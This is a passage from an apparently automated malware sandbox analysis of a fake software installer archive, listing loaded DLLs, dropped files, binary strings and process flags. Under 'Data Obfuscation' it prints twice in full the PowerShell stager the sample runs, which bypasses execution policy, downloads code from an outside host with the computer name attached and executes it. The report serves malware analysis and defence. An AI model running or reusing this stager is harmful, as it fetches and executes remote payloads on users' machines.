                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: installer_1.05_36.4.zipStatic file information: File size 18790457 > 1048576
                  Source: Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdbu source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.2167934211.00000000088FA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64.exe
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
                  Source: Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Projects\WinRAR\SFX\setup\build\sfxrar64\Release\sfxrar.pdb+ source: winrar-x64.exe
                  Source: Binary string: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%cuser + domain + host name too bigcompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
                  Source: Binary string: CrashReportClient.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD078E000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
                  Source: Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr
                  Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: d:\a01\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.10.dr
                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
                  Source: installer_1.05_36.4.exe.10.drStatic PE information: real checksum: 0x10f683 should be: 0x1145f0
                  Source: vcruntime140.dll.10.drStatic PE information: section name: _RDATA
                  Source: opengl32sw.dll.10.drStatic PE information: section name: _RDATA
                  Source: opengl64.dll.10.drStatic PE information: section name: .uedbg
                  Source: opengl64.dll.10.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087EE001 push dword ptr [esp+ecx-75h]; iretd 28_2_087EE00F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_088821B5 push ebp; retf 28_2_088821B6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08882316 push eax; retf 28_2_0888231F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08882328 push eax; retf 28_2_0888232A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08882C05 pushad ; retf 28_2_08882C19
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08883DEC pushad ; retf 28_2_08883DF6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08883DFE pushad ; retf 28_2_08883DFF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08882672 push FFFFFFE8h; ret 28_2_08882679
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B5256C push FFFFFF8Bh; ret 28_2_08B5256F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B57E48 push 34418B08h; ret 28_2_08B57F73
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B9814D push FFFFFFC3h; ret 28_2_08B982C6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B992F3 push FFFFFF8Bh; retf 28_2_08B99306
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B9A4B3 push esp; retf 28_2_08B9A4C1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B985D2 push eax; mov dword ptr [esp], edx28_2_08B985E4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08B9A548 pushad ; retf 28_2_08B9A581
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08C9D080 push 08418B08h; ret 28_2_08C9D0C3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D1A1F8 pushfd ; ret 28_2_08D1A1F9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D11211 push eax; mov dword ptr [esp], edx28_2_08D11224
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D1B750 push eax; iretd 28_2_08D1B751
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D3A218 pushfd ; ret 28_2_08D3A219
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D61018 push eax; mov dword ptr [esp], edx28_2_08D6102C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D629D1 push eax; mov dword ptr [esp], edx28_2_08D629E4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08D67EE4 push esp; retf 28_2_08D67EF1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DC18C0 push 8BD88B08h; retf 28_2_08DC18C5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DD6181 push eax; mov dword ptr [esp], edx28_2_08DD6194
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DDCCD8 push eax; mov dword ptr [esp], edx28_2_08DDCCEC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_08DD5C70 push eax; mov dword ptr [esp], edx28_2_08DD5C84
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_082E239D push ebp; retf 30_2_082E239E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_082F0CF0 push eax; retf 30_2_082F0CF1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_082F0022 pushad ; ret 30_2_082F0031
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_082F1080 push FFFFFFC3h; ret 30_2_082F109A

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dllJump to dropped file
                  Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLLJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
